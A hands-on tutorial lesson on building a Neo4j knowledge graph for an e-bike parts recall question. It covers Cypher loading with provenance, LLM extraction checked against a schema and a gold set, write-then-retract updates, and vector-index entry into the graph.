Graph RAG with Neo4J
Build a knowledge graph in Neo4j, retrieve through a vector index plus graph traversal, and guard model-written Cypher.
SPACED REPETITION Β· 15 practice questions
Make this lesson stick.
Try 3 questions now. No account needed. Sample answers aren't saved.
or sign in to practice all 15The recall that missed a bike
The e-bike maker from Foundations of Modern AI Search now has an internal engineering wiki: spec sheets, supplier profiles, kit pages and service bulletins. On Monday morning, a service manager asks the wiki assistant: "Which bikes are affected by the Kestrel brake caliper recall?" Owners must be told within five working days, so the list has to be complete.
The assistant is a classic RAG pipeline: embed the question, take the top chunks, answer from them. Here is a ten-chunk slice of the wiki and the retrieval step, with the small open model all-MiniLM-L6-v2:
import numpy as np
from sentence_transformers import SentenceTransformer
DOCS = {
"sb-2026-07": "Service bulletin SB-2026-07: Kestrel Components recalls brake caliper BC-310 "
"(lots made in March 2026) because the piston seal can leak. Dealers must "
"replace affected calipers before the bike is ridden again.",
"kestrel": "Supplier profile: Kestrel Components, Porto. Supplies our hydraulic brake "
"calipers BC-310 and BC-420 and the brake lever BL-20.",
"cargo-2": "Cargo 2 (2026) spec sheet: long-tail frame, two 500 Wh batteries, Kestrel "
"BC-420 four-piston brake calipers for heavy loads.",
"city-3": "City 3 (2026) spec sheet: aluminium frame, 500 Wh battery BT-4417, BC-310 "
"hydraulic calipers front and rear.",
"trail-5": "Trail 5 (2026) spec sheet: full-suspension frame, 625 Wh battery BT-6250, "
"brake kit BK-7.",
"bk-7": "Brake kit BK-7: two BC-310 calipers, two BL-20 levers and 180 mm rotors.",
"kids-1": "Kids 1 spec sheet: 20-inch wheels, rim brakes RB-12 from Tallis Parts.",
"brake-care": "Brake care: bleed hydraulic brakes every 12 months and replace pads that are "
"thinner than 1 mm.",
"recall-policy": "Recall policy: when a supplier recalls a part, customer service notifies the "
"owners of every affected model within 5 working days.",
"sb-2026-05": "Service bulletin SB-2026-05: battery BT-4417 needs firmware 3.2 to fix a "
"charging fault.",
}
IDS = list(DOCS)
model = SentenceTransformer("sentence-transformers/all-MiniLM-L6-v2")
VECS = model.encode([DOCS[i] for i in IDS]) # unit-length rows
def search(query, k=3):
scores = VECS @ model.encode(query)
top = np.argsort(-scores)[:k]
return [(IDS[i], round(float(scores[i]), 3)) for i in top]
question = "Which bikes are affected by the Kestrel brake caliper recall?"
for rank, (doc_id, score) in enumerate(search(question, k=len(IDS)), start=1):
print(rank, doc_id, score)
Predict first: the right answer is City 3 (it uses BC-310 directly) and Trail 5 (its brake kit BK-7 contains two BC-310s). Where do their spec sheets rank?
Check your answer
1 sb-2026-07 0.77
2 kestrel 0.539
3 bk-7 0.492
4 cargo-2 0.416
5 city-3 0.381
6 kids-1 0.377
7 trail-5 0.376
8 recall-policy 0.342
9 brake-care 0.307
10 sb-2026-05 0.098
City 3 is 5th and Trail 5 is 7th, below the Kids 1 page.
With the top 3, the prompt holds the bulletin, the supplier profile and the kit page. It names no bike at all, so the best the model can say is "bikes with BC-310 calipers or the BK-7 kit". With the top 5, the model can name City 3 and also meets Cargo 2, the one spec sheet that says "Kestrel ... calipers". Cargo 2 uses BC-420, which is not recalled. A fluent answer, "City 3 and Cargo 2", gets one bike wrong and misses Trail 5. That is precision 1/2 and recall 1/2, on a list that is sent to customers.
Why tuning the retriever will not fix it. The Trail 5 page shares one word with the question ("brake") and names neither Kestrel, the caliper code nor the recall. What connects it to the recall is a chain across three documents: Trail 5 uses BK-7, BK-7 contains BC-310, and SB-2026-07 recalls BC-310. A bigger k, a reranker or BM25 can only rank chunks by how much they resemble the question, and the answer page does not resemble it. The question also asks for a complete set, and top-k returns the k most similar chunks, not every match.
The fix is to store those links as data and let a query follow them. Why and when a knowledge graph is worth building, how Microsoft's GraphRAG uses community reports for "global" questions, and the cheaper variants are the subject of Graph Rag. This lesson is the hands-on half: you build the recall graph in Neo4j, retrieve from it, and put a fence around a model that writes queries against it.
| # | Symptom | Move |
|---|---|---|
| 1 | The answer lives in a link between documents | Store the link as data (property graph, Cypher) |
| 2 | Nobody will type 10,000 facts in by hand | Extract, validate, resolve and keep provenance |
| 3 | The question names no entity you can look up | Give the graph a vector index as its front door |
| 4 | Top-k finds the bulletin but not the bikes | Expand from the anchor through the graph |
| 5 | You are about to write all of this yourself | Use the official package, and know its contract |
| 6 | Users ask counts and lists you did not anticipate | Let a model write Cypher, inside a fence |
| 7 | Someone asks for "themes" or clusters | Communities, and the licence of each option |
Setup. Everything below ran on Neo4j 2026.09.0 Community Edition with Python 3.12, the neo4j driver 6.3.1, neo4j-graphrag 1.21.0 and sentence-transformers 6.1.0. Neo4j now uses calendar versions (2025.x, 2026.x); 5.26 is the long-term-support line, and several features below need a 2026 release. To follow along, start a local server with Docker (the image tag and the plugin variable come from the Neo4j Docker docs):
docker run -d --name neo4j -p 7474:7474 -p 7687:7687 \
--env NEO4J_AUTH=neo4j/ragcourse2026 --env NEO4J_PLUGINS='["apoc"]' neo4j:2026.09.0
pip install "neo4j-graphrag[sentence-transformers]" networkx
The code blocks form one Python session: each block continues from the ones above it.
Move 1: Store the link as data
Symptom: the answer needs a relation that no single chunk states.
The property graph model
Neo4j stores a property graph:
- Nodes carry one or more labels (
Bike,Part,Supplier,Bulletin) and properties (keyβvalue pairs such asname: "City 3"). - Relationships have exactly one type (
HAS_PART), a direction, and may carry properties too.
The recall question needs four relationship patterns:
(:Bike)-[:HAS_PART]->(:Part) City 3 uses BC-310
(:Part)-[:HAS_PART]->(:Part) kit BK-7 contains BC-310
(:Part)-[:SUPPLIED_BY]->(:Supplier) BC-310 comes from Kestrel Components
(:Bulletin)-[:COVERS]->(:Part) SB-2026-07 recalls BC-310
Type the facts in by hand first. Before you pay for extraction, write down 15β20 facts for your real questions and check that the queries answer them. If the schema cannot express a question, you find out for free. The hand-typed facts also become your gold set for measuring extraction later.
from neo4j import GraphDatabase, RoutingControl
driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "ragcourse2026"))
for label in ["Bike", "Part", "Supplier", "Bulletin"]: # one key per label: name
driver.execute_query(f"CREATE CONSTRAINT {label.lower()}_name IF NOT EXISTS "
f"FOR (n:{label}) REQUIRE n.name IS UNIQUE")
# (source label, source, relationship type, target label, target), typed in by hand
GOLD = [
("Bulletin", "SB-2026-07", "COVERS", "Part", "BC-310"),
("Bulletin", "SB-2026-05", "COVERS", "Part", "BT-4417"),
("Part", "BC-310", "SUPPLIED_BY", "Supplier", "Kestrel Components"),
("Part", "BC-420", "SUPPLIED_BY", "Supplier", "Kestrel Components"),
("Part", "BL-20", "SUPPLIED_BY", "Supplier", "Kestrel Components"),
("Part", "RB-12", "SUPPLIED_BY", "Supplier", "Tallis Parts"),
("Bike", "City 3", "HAS_PART", "Part", "BC-310"),
("Bike", "City 3", "HAS_PART", "Part", "BT-4417"),
("Bike", "Trail 5", "HAS_PART", "Part", "BK-7"),
("Bike", "Trail 5", "HAS_PART", "Part", "BT-6250"),
("Part", "BK-7", "HAS_PART", "Part", "BC-310"),
("Part", "BK-7", "HAS_PART", "Part", "BL-20"),
("Bike", "Cargo 2", "HAS_PART", "Part", "BC-420"),
("Bike", "Kids 1", "HAS_PART", "Part", "RB-12"),
]
LOAD_FACTS = """
UNWIND $rows AS row
MERGE (s:$(row.s_label) {name: row.s})
MERGE (t:$(row.t_label) {name: row.t})
MERGE (s)-[r:$(row.rel)]->(t)
SET r.sources = CASE WHEN row.source IN coalesce(r.sources, []) THEN r.sources
ELSE coalesce(r.sources, []) + row.source END
"""
def load_facts(facts, source):
rows = [dict(s_label=a, s=b, rel=c, t_label=d, t=e, source=source)
for a, b, c, d, e in facts]
counters = driver.execute_query(LOAD_FACTS, rows=rows).summary.counters
return counters.nodes_created, counters.relationships_created
print(load_facts(GOLD, source="hand")) # (nodes, relationships) created
print(load_facts(GOLD, source="hand")) # run it again
(15, 14)
(0, 0)
Five choices in that block matter more than the syntax:
MERGEplus a uniqueness constraint makes loading idempotent.MERGEmeans "match this pattern, or create it if it is missing", so the second run creates nothing. The constraint turns eachMERGEinto an index lookup and stops two concurrent loaders from creating two "BC-310" nodes. Without it, everyMERGEscans all nodes with that label.- One
UNWINDper batch, not one transaction per fact. Each transaction costs a network round trip and a commit. On a local server, writing 300 chunk nodes with 384-dimensional vectors as oneUNWINDwas 7β15Γ faster than one transaction per node, across runs on different days. Over a real network the gap grows. - Labels and types come in as parameters.
$(row.s_label)is Neo4j's dynamic label syntax. Nothing is pasted into the query string, so a strange name cannot change the query. (The constraint loop builds its string with an f-string only because schema commands take no parameters, and its labels are constants.) - Keys are your own. Neo4j's internal ids are reused after deletes, and the
id()function is deprecated. The server returns a deprecation warning for it.elementId()is only guaranteed within one transaction, so the manual recommends application-generated ids. Here the key isname. - Every relationship records its
sources. For hand-typed facts the source is"hand". From Move 2 on it is the id of the chunk that stated the fact. You will need this when a document changes.
Following the links
AFFECTED = """
MATCH (:Bulletin {name: $bulletin})-[:COVERS]->(p:Part)
MATCH path = (m:Bike)-[:HAS_PART*1..3]->(p)
RETURN m.name AS bike, [n IN nodes(path) | n.name] AS via
ORDER BY bike
"""
def affected(bulletin):
records, _, _ = driver.execute_query(AFFECTED, bulletin=bulletin,
routing_=RoutingControl.READ)
return [(r["bike"], " > ".join(r["via"])) for r in records]
for bike, via in affected("SB-2026-07"):
print(bike, "|", via)
Read the pattern left to right: start at the bulletin, follow COVERS to the recalled part, then find every bike that reaches that part through one to three HAS_PART hops. The arrow direction matters. (m:Bike)<-[:HAS_PART]-(p) would ask for parts that contain bikes, and it returns nothing.
Predict: which bikes come back, and which one would a single-hop pattern (m:Bike)-[:HAS_PART]->(p) miss?
Check your answer
City 3 | City 3 > BC-310
Trail 5 | Trail 5 > BK-7 > BC-310
The single-hop pattern misses Trail 5, which reaches BC-310 only through its kit. *1..3 allows kits inside kits, up to three levels. The via column is the explanation you show a service manager: the exact chain of parts behind each bike.
Rows are not answers
Your turn. The purchasing team asks which bikes contain any Kestrel part. How many rows does this print, and how many distinct bikes?
BY_SUPPLIER = """
MATCH (:Supplier {name: $supplier})<-[:SUPPLIED_BY]-(p:Part)<-[:HAS_PART*1..3]-(m:Bike)
RETURN m.name AS bike, p.name AS part
ORDER BY bike, part
"""
records, _, _ = driver.execute_query(BY_SUPPLIER, supplier="Kestrel Components",
routing_=RoutingControl.READ)
print(len(records), [(r["bike"], r["part"]) for r in records])
Check your answer
4 [('Cargo 2', 'BC-420'), ('City 3', 'BC-310'), ('Trail 5', 'BC-310'), ('Trail 5', 'BL-20')]
Four rows but three bikes. Cypher returns one row per matching path, and Trail 5 reaches two Kestrel parts through BK-7. Anything that counts must count distinct values: RETURN DISTINCT m.name, or count(DISTINCT m). A dashboard that counts rows says "4 bikes affected".
Failure modes, and what the fix costs
β οΈ Unbounded paths. [:HAS_PART*] with no upper bound explores every path of any length. On a real bill of materials with shared sub-assemblies, the number of paths grows much faster than the number of parts. Always bound the length (*1..3) and restrict the relationship types. The bound is a claim about your data ("kits nest at most three deep"), so check it with a query now and then.
β οΈ A required MATCH that finds nothing removes the whole row. If a query has three MATCH clauses and the third finds nothing for one anchor, that anchor disappears from the results instead of coming back with a blank. Use OPTIONAL MATCH for context that may be missing. Move 4 does this.
β οΈ Wrong direction or wrong type is silent. A misspelled relationship type, or an arrow pointing the wrong way, returns zero rows without an error. Test every query against a question whose answer you know, like the recall above.
Move 2: Build the graph from documents
Symptom: the hand-typed graph works, and the real wiki has 50,000 chunks.
Each chunk goes to an extraction model with the schema. The model returns entities and relations as JSON, and your code checks them before anything reaches the database. Choosing what to extract, and how to resolve entities at scale, is covered in Graph Rag. Here you build the loading side: the contract, the checks, provenance and updates.
The real call
This sketch uses Anthropic's Messages API with structured outputs. The schema constrains the answer to valid JSON, and the enum lists restrict labels and relationship types to the allowed ones. It needs an API key, so the offline session below uses a stub that returns the same shape. The model id is an example as of September 2026; pick a current one from your provider's model list.
import json
import anthropic
MODEL = "claude-haiku-4-5-20251001" # a small model, as in Graph Rag; example id as of 2026-09
client = anthropic.Anthropic() # reads ANTHROPIC_API_KEY from the environment
ENTITY = {"type": "object", "additionalProperties": False, "required": ["label", "name"],
"properties": {"label": {"type": "string",
"enum": ["Bike", "Part", "Supplier", "Bulletin"]},
"name": {"type": "string"}}}
RELATION = {"type": "object", "additionalProperties": False,
"required": ["source", "type", "target"],
"properties": {"source": {"type": "string"},
"type": {"type": "string",
"enum": ["HAS_PART", "SUPPLIED_BY", "COVERS"]},
"target": {"type": "string"}}}
SCHEMA = {"type": "object", "additionalProperties": False,
"required": ["entities", "relations"],
"properties": {"entities": {"type": "array", "items": ENTITY},
"relations": {"type": "array", "items": RELATION}}}
INSTRUCTIONS = """Extract entities and relations for a bike parts graph.
Allowed: (Bike)-[HAS_PART]->(Part), (Part)-[HAS_PART]->(Part),
(Part)-[SUPPLIED_BY]->(Supplier), (Bulletin)-[COVERS]->(Part).
Copy names and part codes exactly as written. Extract only what the text states.
Text:
"""
def extract(text):
response = client.messages.create(
model=MODEL, max_tokens=16000,
messages=[{"role": "user", "content": INSTRUCTIONS + text}],
output_config={"format": {"type": "json_schema", "schema": SCHEMA}})
if response.stop_reason != "end_turn": # max_tokens or refusal: output is incomplete
raise RuntimeError(f"extraction stopped: {response.stop_reason}")
return json.loads(next(b.text for b in response.content if b.type == "text"))
Constrained decoding removes one class of error: the output always parses, and every label and type comes from the list. It does not stop the model from writing a relation backwards, spelling a code two ways, or stating a fact the text never states. Those need checks in code.
Cost, before you run it on everything. Extraction is one model call per chunk. Cache the model's raw output per chunk, keyed by the chunk text's hash, the model, the prompt version and the schema. A rebuild then pays only for changed chunks and reruns the cheap checks below on the cached output; a new model, prompt or schema pays for every chunk again (Graph Rag). Assume 50,000 chunks, 700 input tokens per call (instructions plus chunk), 250 output tokens, and the small model's prices of USD 1 per million input tokens and USD 5 per million output tokens. That is 35 million input and 12.5 million output tokens: 35 + 62.5 = USD 97.50 per full pass. Substitute your provider's current prices; the bigger bill is usually engineering time spent on the errors below.
What came back
Here is what an extraction model returned for the ten chunks. The output contains five realistic mistakes. Find them before reading on:
def out(entities, relations): # the JSON shape the real call returns (see above)
return {"entities": [{"label": l, "name": n} for l, n in entities],
"relations": [{"source": s, "type": t, "target": o} for s, t, o in relations]}
EXTRACTED = { # what an extraction model returned for each chunk
"sb-2026-07": out([("Bulletin", "SB-2026-07"), ("Supplier", "Kestrel Components"),
("Part", "BC-310")],
[("BC-310", "COVERS", "SB-2026-07"),
("BC-310", "SUPPLIED_BY", "Kestrel Components")]),
"kestrel": out([("Supplier", "Kestrel Components"), ("Part", "BC-310"), ("Part", "BC-420"),
("Part", "BL-20"), ("Bike", "Cargo 2")],
[("BC-310", "SUPPLIED_BY", "Kestrel Components"),
("BC-420", "SUPPLIED_BY", "Kestrel Components"),
("BL-20", "SUPPLIED_BY", "Kestrel Components"),
("Kestrel Components", "HAS_PART", "BC-310"),
("Cargo 2", "HAS_PART", "BC-420")]),
"cargo-2": out([("Bike", "Cargo 2"), ("Part", "BC-420"), ("Supplier", "Kestrel")],
[("Cargo 2", "HAS_PART", "BC-420"), ("BC-420", "SUPPLIED_BY", "Kestrel")]),
"city-3": out([("Bike", "City 3"), ("Part", "BT-4417"), ("Part", "BC-310")],
[("City 3", "HAS_PART", "BT-4417"), ("City 3", "HAS_PART", "BC-310")]),
"trail-5": out([("Bike", "Trail 5"), ("Part", "BT-6250"), ("Part", "BK-7")],
[("Trail 5", "HAS_PART", "BT-6250"), ("Trail 5", "HAS_PART", "BK-7")]),
"bk-7": out([("Part", "BK-7"), ("Part", "BC310"), ("Part", "BL-20")],
[("BK-7", "HAS_PART", "BC310"), ("BK-7", "HAS_PART", "BL-20")]),
"kids-1": out([("Bike", "Kids 1"), ("Part", "RB-12"), ("Supplier", "Tallis Parts")],
[("Kids 1", "HAS_PART", "RB-12")]),
"brake-care": out([], []),
"recall-policy": out([], []),
"sb-2026-05": out([("Bulletin", "SB-2026-05"), ("Part", "BT-4417")],
[("SB-2026-05", "COVERS", "BT-4417")]),
}
Check your answer
- Backwards:
BC-310 COVERS SB-2026-07. A part does not cover a bulletin. - Impossible pattern:
Kestrel Components HAS_PART BC-310. Suppliers supply parts; they are not assembled from them. - Invented fact:
Cargo 2 HAS_PART BC-420, extracted from the supplier profile, which never mentions Cargo 2. It happens to be true (the Cargo 2 page says so), but this chunk is not evidence for it. - Two spellings of one thing:
BC310in the kit page andKestrelin the Cargo 2 page. Loaded as they are, you would get a second caliper node and a second supplier node. - Missed fact: the Kids 1 page says the rim brakes come "from Tallis Parts", and no
SUPPLIED_BYrelation came back.
Check every fact before it lands
import re
PATTERNS = {("Bike", "HAS_PART", "Part"), ("Part", "HAS_PART", "Part"),
("Part", "SUPPLIED_BY", "Supplier"), ("Bulletin", "COVERS", "Part")}
LABELS = {"Bike", "Part", "Supplier", "Bulletin"}
ALIASES = {"kestrel": "Kestrel Components"} # curated entity-resolution table
CODE = re.compile(r"^([A-Z]{2})-?(\d+)$") # part codes such as BC-310
def canon(name):
name = " ".join(name.split())
name = ALIASES.get(name.lower(), name)
m = CODE.match(name.upper())
return f"{m[1]}-{m[2]}" if m else name
def grounded(raw, name, text):
return raw.lower() in text.lower() or name.lower() in text.lower()
def validate(chunk_id, text, extraction):
label_of, raw_of = {}, {}
for e in extraction["entities"]:
name = canon(e["name"])
label_of[name], raw_of[name] = e["label"], e["name"]
facts, issues = [], []
for r in extraction["relations"]:
s, rel, t = canon(r["source"]), r["type"], canon(r["target"])
ls, lt = label_of.get(s), label_of.get(t)
if (ls, rel, lt) not in PATTERNS and (lt, rel, ls) in PATTERNS:
s, t, ls, lt = t, s, lt, ls
issues.append((chunk_id, s, rel, t, "flipped (kept)"))
if (ls, rel, lt) not in PATTERNS:
issues.append((chunk_id, s, rel, t, "rejected: pattern not in schema"))
elif not (grounded(raw_of[s], s, text) and grounded(raw_of[t], t, text)):
issues.append((chunk_id, s, rel, t, "rejected: entity not in chunk text"))
else:
facts.append((ls, s, rel, lt, t))
mentions = sorted({(label_of[n], n) for n in label_of
if label_of[n] in LABELS and grounded(raw_of[n], n, text)})
return facts, issues, mentions
all_facts = []
for doc_id, text in DOCS.items():
facts, issues, _ = validate(f"{doc_id}#v1#0", text, EXTRACTED[doc_id])
all_facts += facts
for issue in issues:
print(issue)
extracted = {(s, rel, t) for _, s, rel, _, t in all_facts}
gold = {(s, rel, t) for _, s, rel, _, t in GOLD}
hits = extracted & gold
print(f"precision {len(hits) / len(extracted):.3f} recall {len(hits) / len(gold):.3f}")
print("missed:", gold - extracted, "| extra:", extracted - gold)
('sb-2026-07#v1#0', 'SB-2026-07', 'COVERS', 'BC-310', 'flipped (kept)')
('kestrel#v1#0', 'Kestrel Components', 'HAS_PART', 'BC-310', 'rejected: pattern not in schema')
('kestrel#v1#0', 'Cargo 2', 'HAS_PART', 'BC-420', 'rejected: entity not in chunk text')
precision 1.000 recall 0.929
missed: {('RB-12', 'SUPPLIED_BY', 'Tallis Parts')} | extra: set()
Each check catches a different mistake:
| Check | Catches | Misses |
|---|---|---|
| Pattern allow-list (with a flip when only the reverse is allowed) | Backwards and impossible relations | A wrong fact with a legal shape |
canon(): code format plus an alias table |
BC310, Kestrel |
Aliases nobody has listed yet |
| Grounding: both names must appear in this chunk | Facts that name an entity this chunk never mentions | A wrong or unstated relation between two entities the chunk does mention; facts the chunk states that are wrong |
| Precision and recall against the gold set | Everything, on the sample you labeled | Anything outside that sample |
The last row is the one that tells you whether the others are enough. If the model had read "BC-420 and BL-20" in the supplier profile and returned BC-420 HAS_PART BL-20, the fact would pass all three code checks: the pattern is legal and both names are in the chunk. Only the gold comparison would catch it. Recall 0.929 is 13 of 14 gold facts. The missed fact costs more than 7% of the answers, because answers need chains. If each fact is present with probability 0.929 and misses are independent, a chain of two facts survives with probability 0.929Β² β 0.86 and a chain of three with 0.929Β³ β 0.80. Trail 5's recall chain has three facts. So label a sample of 50β100 chunks by hand, and track extraction precision and recall per relationship type whenever you change the model or the prompt.
Your turn. Delete the ALIASES entry and rerun the check. Predict precision, recall and the effect on the graph.
Check your answer
BC-420 SUPPLIED_BY Kestrel becomes an extra fact that is not in the gold set. Precision drops to 13/14 β 0.929 and recall stays at 13/14 β 0.929, because the supplier profile still yields the correct BC-420 SUPPLIED_BY Kestrel Components. In the graph you would get a second Supplier node called "Kestrel", and a query for every Kestrel part would miss whatever only the Cargo 2 page says. Entity resolution is part of extraction quality, and the gold comparison is what makes a missing alias visible.
Load it with provenance
driver.execute_query("CREATE CONSTRAINT chunk_id IF NOT EXISTS FOR (c:Chunk) REQUIRE c.id IS UNIQUE")
driver.execute_query("CREATE INDEX chunk_doc IF NOT EXISTS FOR (c:Chunk) ON (c.doc_id)")
WRITE_CHUNK = """
MERGE (c:Chunk {id: $id})
SET c.doc_id = $doc_id, c.version = $version, c.text = $text
WITH c
CALL db.create.setNodeVectorProperty(c, 'embedding', $embedding)
"""
WRITE_MENTIONS = """
UNWIND $rows AS row
MATCH (c:Chunk {id: row.chunk})
MERGE (e:$(row.label) {name: row.name})
MERGE (c)-[:MENTIONS]->(e)
"""
def ingest(doc_id, text, extraction, version=1):
chunk_id = f"{doc_id}#v{version}#0" # one chunk per document in this toy corpus
facts, issues, mentions = validate(chunk_id, text, extraction)
driver.execute_query(WRITE_CHUNK, id=chunk_id, doc_id=doc_id, version=version, text=text,
embedding=model.encode(text).tolist())
driver.execute_query(WRITE_MENTIONS, rows=[dict(chunk=chunk_id, label=l, name=n)
for l, n in mentions])
load_facts(facts, source=chunk_id)
return issues
# Start over: remove the hand-built graph, then build it from the documents.
driver.execute_query("MATCH (n) WHERE n:Bike OR n:Part OR n:Supplier OR n:Bulletin "
"DETACH DELETE n")
for doc_id, text in DOCS.items():
ingest(doc_id, text, EXTRACTED[doc_id])
print(affected("SB-2026-07"))
[('City 3', 'City 3 > BC-310'), ('Trail 5', 'Trail 5 > BK-7 > BC-310')]
The extracted graph gives the same answer as the hand-built one. It now holds two layers:
(:Chunk {id, doc_id, version, text, embedding}) --MENTIONS--> (:Bike | :Part | :Supplier | :Bulletin)
(entity) --HAS_PART | SUPPLIED_BY | COVERS {sources: [chunk ids]}--> (entity)
The chunks are the evidence and the entities are the facts. MENTIONS links the two, so a vector hit on a chunk can step into the facts (Move 4). sources on each fact names the chunks that stated it, so an answer built from the graph can cite text. BC-310 SUPPLIED_BY Kestrel Components has two sources, the bulletin and the supplier profile.
A chunk id such as trail-5#v1#0 names the document, its version and the chunk's position. The document id trail-5 stays the same across edits, so every version of the spec sheet can be found by doc_id. The version is in the chunk id so that a citation always points at the text that stated the fact, even after the sheet changes.
When a document changes
Engineering revises the Trail 5 spec sheet: it now ships with brake kit BK-9. The document id stays trail-5, because a document's id must be stable across edits (Data Pipeline & Indexing explains why), and the revised text becomes version 2. The obvious update is to ingest it:
REVISED = ("Trail 5 (2026) spec sheet, revision B: full-suspension frame, 625 Wh battery "
"BT-6250, brake kit BK-9.")
REVISED_OUT = out([("Bike", "Trail 5"), ("Part", "BT-6250"), ("Part", "BK-9")],
[("Trail 5", "HAS_PART", "BT-6250"), ("Trail 5", "HAS_PART", "BK-9")])
ingest("trail-5", REVISED, REVISED_OUT, version=2) # naive update: write version 2 and stop
print(affected("SB-2026-07"))
Predict: is Trail 5 still on the recall list?
Check your answer
[('City 3', 'City 3 > BC-310'), ('Trail 5', 'Trail 5 > BK-7 > BC-310')]
Yes, and it is wrong now. Ingesting only adds. Version 2's facts are in the graph, and so are version 1's: Trail 5 HAS_PART BK-7 still cites trail-5#v1#0, and that chunk is still in the vector index next to the new one. Customers get a recall letter for a bike that no longer has the part.
The fix has two steps, in this order: write the new version, then retract the old one. Provenance makes the second step possible:
def retract(doc_id, keep_version=None):
"""Remove a document's chunks (except keep_version's) and every fact no other chunk supports."""
driver.execute_query("""
MATCH (c:Chunk {doc_id: $doc_id})-[:MENTIONS]->()-[r]-()
WHERE c.version <> coalesce($keep, -1) AND c.id IN r.sources
SET r.sources = [s IN r.sources WHERE s <> c.id]
WITH DISTINCT r WHERE size(r.sources) = 0
DELETE r""", doc_id=doc_id, keep=keep_version)
driver.execute_query("MATCH (c:Chunk {doc_id: $doc_id}) WHERE c.version <> coalesce($keep, -1) "
"DETACH DELETE c", doc_id=doc_id, keep=keep_version)
driver.execute_query("MATCH (e) WHERE (e:Bike OR e:Part OR e:Supplier OR e:Bulletin) "
"AND NOT (e)--() DELETE e") # entities nothing points to any more
def update(doc_id, text, extraction, version):
ingest(doc_id, text, extraction, version) # 1. write the new version
retract(doc_id, keep_version=version) # 2. then take back what only older versions said
update("trail-5", REVISED, REVISED_OUT, version=2)
print(affected("SB-2026-07"))
update("trail-5", DOCS["trail-5"], EXTRACTED["trail-5"], version=1) # restore the original sheet
[('City 3', 'City 3 > BC-310')]
Why it works. The grounding check guarantees that both ends of every fact are mentioned by the chunk that stated it. So walking out from the old chunk's MENTIONS reaches every fact it supports, without scanning all relationships. A fact that another source still states survives with its other sources: Trail 5 HAS_PART BT-6250 is in both versions, and after the update it cites only trail-5#v2#0. A fact that only the old version stated is deleted. Deleting nodes by name would be wrong here: BK-7 still exists, and its kit page still says it contains BC-310.
Why this order. If you retract first, there is a moment when the graph holds neither version. We tried it: between retract("trail-5") and ingesting the unchanged sheet again, the recall list held only City 3. A recall report run at that moment silently drops a bike. If you write first, readers see the old answer until the new version is complete. For a moment both versions are visible, which errs on the side of listing a bike. If even that is unacceptable, run both steps in one transaction. The vector-side lessons use the same write-then-delete order (Data Freshness & Lifecycle).
β οΈ Deletes need the same care. A document removed at the source must be retracted (retract(doc_id), keeping no version), not just skipped by the next run, or its facts live on in the graph. Remove it from whatever a full rebuild reads, too, or the next rebuild brings it back. The pipeline-level recipe (stable ids, change detection, deletes that reach every copy) is in Data Pipeline & Indexing.
Move 3: Give the graph a front door
Symptom: the question names no entity you can look up. "The Kestrel brake caliper recall" is not a node name; SB-2026-07 is.
Chunks already carry embeddings. A vector index turns them into a way in: find the chunks closest to the question, then step from those chunks into the graph.
driver.execute_query("""
CREATE VECTOR INDEX chunk_embedding IF NOT EXISTS
FOR (c:Chunk) ON c.embedding
OPTIONS {indexConfig: {`vector.dimensions`: 384, `vector.similarity_function`: 'cosine'}}
""")
driver.execute_query("CALL db.awaitIndexes(60)")
SEARCH = """
MATCH (c:Chunk)
SEARCH c IN (VECTOR INDEX chunk_embedding FOR $q LIMIT $k)
SCORE AS score
RETURN c.id AS id, round(score, 3) AS score
"""
q = model.encode(question).tolist()
records, _, _ = driver.execute_query(SEARCH, q=q, k=3, routing_=RoutingControl.READ)
print([(r["id"], r["score"]) for r in records])
Predict: numpy gave the bulletin a cosine of 0.77. What score does Neo4j report for it?
Check your answer
[('sb-2026-07#v1#0', 0.885), ('kestrel#v1#0', 0.77), ('bk-7#v1#0', 0.746)]
Same order, different numbers. Neo4j's cosine score is (1 + cos) / 2, rescaled to the range 0 to 1: (1 + 0.77) / 2 = 0.885, and a score of 0.5 means cosine 0. Euclidean scores are 1 / (1 + dΒ²). Both formulas are in the vector index docs. The score is a monotonic transform, so ranking is unaffected. But a cut-off tuned on raw cosine in a prototype means something else here: 0.7 in Neo4j is a raw cosine of 0.4.
SEARCH is the Cypher 25 clause for querying vector indexes. It has been the preferred form since Neo4j 2026.01, and the older db.index.vector.queryNodes procedure is deprecated since 2026.04; the server returns a deprecation warning for it. Cypher 5 rejects SEARCH with a syntax error. Our server's databases default to Cypher 25 (check with SHOW DATABASES YIELD name, defaultLanguage). On a database that defaults to Cypher 5, prefix the query with CYPHER 25.
What the index is, and how it fails
records, _, _ = driver.execute_query(
"SHOW VECTOR INDEXES YIELD name, options WHERE name = 'chunk_embedding' RETURN options")
print(records[0]["options"]["indexConfig"])
try:
driver.execute_query(SEARCH, q=[0.1] * 768, k=3) # a query vector from a 768-d model
except Exception as e:
print(type(e).__name__, "|", e.message)
{'vector.dimensions': 384, 'vector.default_search_expansion_factor': 3.0, 'vector.hnsw.m': 16, 'vector.quantization.type': 'BINARY', 'vector.similarity_function': 'COSINE', 'vector.hnsw.ef_construction': 100}
CypherTypeError | Vector index 'chunk_embedding' has a configured dimensionality of 384, but the provided vector has dimension 768.
Read the configuration line by line:
- HNSW with
m = 16andef_construction = 100, the defaults. It is an approximate index, with the trade-offs taught in ANN Algorithms. - Binary quantization is the default for new indexes since Neo4j 2026.08. The index keeps one bit per dimension for the graph search, fetches 3Γ the requested neighbours (
default_search_expansion_factor), and rescores them with the full vectors. That is the oversample-and-rescore pattern from the ANN lesson. - Similarity is
cosineoreuclidean. Asking for'dot'fails with "'DOT' is an unsupported 'vector.similarity_function'". If your model was trained for dot product on unnormalized vectors, check on labeled queries that cosine ranking is acceptable, or use a store that supports dot product. vector.dimensionsis optional but worth setting. With it, a mismatch fails loudly at query time, as above.
The loud failure has a silent twin. A 768-dimensional vector written to a chunk under this 384-dimensional index is accepted without a warning, and the chunk simply drops out of the index. We tried it: the next 10-nearest search returned 9 chunks. The trap is the same as in Vector Embeddings. If the new model has a different dimension, new documents vanish from search while queries with the old model keep working. If it has the same dimension, nothing fails anywhere and quality degrades quietly. Tag each chunk with its embedding model and version, and re-embed into a new index when you change either.
The index needs no refresh step. It picks up committed writes: a chunk added after the index was built is searchable on the next query. The only exception in the docs is that "changes made within the same transaction are not visible to the index." The embeddings are stored as LIST<FLOAT> values. The native VECTOR property type (Neo4j 2025.10+) needs the block store format, which is available in Enterprise Edition and Aura, not in Community.
